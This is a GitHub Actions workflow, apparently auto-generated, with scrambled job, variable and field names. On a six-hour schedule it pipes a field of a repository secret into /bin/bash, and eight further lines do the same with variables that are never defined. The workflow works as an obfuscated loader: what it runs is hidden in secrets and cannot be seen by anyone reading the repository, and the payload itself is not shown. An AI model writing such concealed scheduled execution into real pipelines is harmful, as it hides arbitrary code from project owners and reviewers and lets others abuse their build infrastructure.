name: minidisctransire

on:
  workflow_dispatch:
  schedule:
    - cron: '35 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: minidisctransire
        env:
          qexi85: ${{ secrets.qexi85 }}
        run: |
          echo $qexi85 | jq -r .fe79953 | /bin/bash
          echo $bzw29 | jq -r .v40902 | /bin/bash
          echo $qhx86718 | jq -r .o1061 | /bin/bash
          echo $k97 | jq -r .oloi4 | /bin/bash
          echo $iok13973 | jq -r .o591 | /bin/bash
          echo $syw3878 | jq -r .tqfyl316 | /bin/bash
          echo $djasr0 | jq -r .cupuc70 | /bin/bash
          echo $s12 | jq -r .fglrx21 | /bin/bash
          echo $vmj91008 | jq -r .wjfcj776 | /bin/bash

